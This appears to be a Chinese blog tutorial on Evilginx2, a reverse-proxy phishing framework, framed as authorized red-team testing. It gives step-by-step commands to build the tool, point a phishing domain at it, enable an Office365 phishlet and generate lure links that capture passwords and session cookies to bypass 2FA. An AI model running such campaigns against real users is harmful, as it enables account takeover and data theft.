众力资讯网

黑客渗透测试之2FA绕过钓鱼神器:Evilginx2

用心做分享,只为给您最好的学习教程如果您觉得文章不错,欢迎持续学习兄弟们好啊!我是你们的老铁。很久没有分享实战案例了,今

如果您觉得文章不错,欢迎持续学习

兄弟们好啊!我是你们的老铁。很久没有分享实战案例了,今天咱们聊聊Evilginx2,这家伙在红队钓鱼测试里简直是神器一般的存在。传统钓鱼容易被2FA卡住,它却能直接代理真实登录页面,把用户名密码连同会话cookie一起抓走,实现2FA直接绕过。

我玩了挺久,觉得它最厉害的地方就是把复杂MITM攻击变的更简单。今天这篇文章我会从头讲起,包括安装、配置、实战,全程配图,手把手带你们学习。新手看完基本就能自己搭个测试环境,老鸟也能顺便复习。

Evilginx2到底是个啥?

Evilginx2(现在也叫Evilginx 3.0)是个开源的中间人攻击框架,主要用来做授权渗透测试里的高级钓鱼。它能代理目标网站的真实登录页面,把用户输入的凭据和2FA token连同session cookie全吃掉,让你直接用cookie登录,绕过2FA保护。

核心就三样:

自己的HTTP/DNS服务器

Phishlet模板(针对不同网站如Office365、Google、Microsoft等预设配置)

自动生成钓鱼链接

官方没有免费Pro版,但开源版已经够强了。提醒一句:这篇文章纯分享学习,只能在授权环境下用,非法操作别碰,后果自己扛!

安装配置,手把手来

环境准备很简单,我常用Ubuntu。

装Go语言

(至少1.14以上)sudo apt update && sudo apt install golang-go

克隆仓库并编译

git clone https://github.com/kgretzky/evilginx2.gitcd evilginx2make

复制phishlets

(重要) 把phishlets文件夹里的文件复制到系统路径:sudo mkdir -p /usr/share/evilginx/phishletssudo cp -r ./phishlets/* /usr/share/evilginx/phishlets/

把evilginx加到系统路径

sudo cp ./build/evilginx /usr/local/bin/

第一次运行

evilginx它会自动创建配置文件,输入exit退出。

核心操作:从配置phishlet到生成钓鱼链接

启动Evilginx

evilginx

配置域名

(必须有自己的域名并解析到服务器)config domain yourphishdomain.comconfig ip 你的服务器IP

加载并配置phishlet

(以Office365为例)phishlets enable o365phishlets hostname o365 login.yourphishdomain.com

生成钓鱼链接

phishlets get-url o365复制这个链接发给测试目标,用户一登录,凭据和cookie就自动抓到!

实战案例:企业授权钓鱼测试(模拟)

目标是验证员工对2FA的防护。

我用上面步骤配置了o365 phishlet,生成链接通过邮件发给测试账号。对方点开登录输入密码和2FA后,我这边立刻收到完整session cookie。

我直接用抓到的cookie登录对方邮箱和Teams,整个过程不到5分钟就拿到内部访问权。测试完我把日志和报告交给了客户,顺便帮他们加固了钓鱼防护。

最后唠两句

Evilginx2用熟了,红队钓鱼测试确实省心不少。但我得再强调一遍:这是授权测试工具,cracked版或者非法使用千万别碰。这篇文章就当大家学习交流用,实际操作一定得在合法授权环境下。

兄弟们有空自己搭个环境练练手(记得用测试域名),有啥问题或者想分享的经验,评论区直接说,我看到就回。

本文仅作技术分享 切勿用于非法途径